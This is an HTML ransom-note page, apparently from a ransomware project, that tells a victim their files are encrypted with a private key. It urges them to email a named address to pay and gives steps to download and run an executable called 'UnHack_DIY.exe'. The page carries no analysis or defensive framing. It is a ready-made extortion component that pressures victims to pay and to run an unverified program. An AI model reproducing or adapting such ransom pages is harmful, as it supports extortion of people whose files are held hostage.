<!DOCTYPE html>
<html>
<head>
<meta charset="ISO-8859-1">
<title>Victim Help Page</title>
</head>
<body style="background-color: #f3f3f3;"> <!-- style="background-image: url('hacked.gif'); opacity: 0.6" -->
<h1 style="color: red; font-family: Calibri; letter-spacing: 0.8;">
Congratulations You are hacked Pay us some ransome to unhack yourself!!</h1>
<img alt="Hacked Image" src="hacked.jpg"><br>
<img alt="Encryped Image" src="encrypted.png"><br>
<h3 style="font-family: Calibri;">You will not be able to read your contents from your important files they all are encrypted with private 
Key!!</h3>
<h2 style="font-family: Calibri;"><a href="mailto:sanjay.nagarur@gmail.com?subject=I%20got%20hacked%20by%20your%20ransomware%20attack
&body=I%20am%20ready%20to%20pay%20amount%20to%20you%20in%20exchange%20of%20private%20key%20%0A%0A
Please%20provide%20me%20payment%20details%20and%20private%20key%20to%20decrypt%20my%20contents">
Email Hacker asking for Private Key</a></h2>

<h2 style="font-family: Calibri; font-style: underlined;"><u>Follow these steps to Decrypt your content :</u></h2>
<ol style="font-size: 24px; font-family: Calibri;">
<li><a id="download" href="UnHack_DIY.exe" download>Click Here</a>  to UnHack yourself.</li>
<li>Execute the <i>UnHack_DIY</i> Application</li>
<li>Enter the Private Key provided by the Hacker. Hacker gives you private key only if you pay ransome.</li>
</ol>

</body>
</html>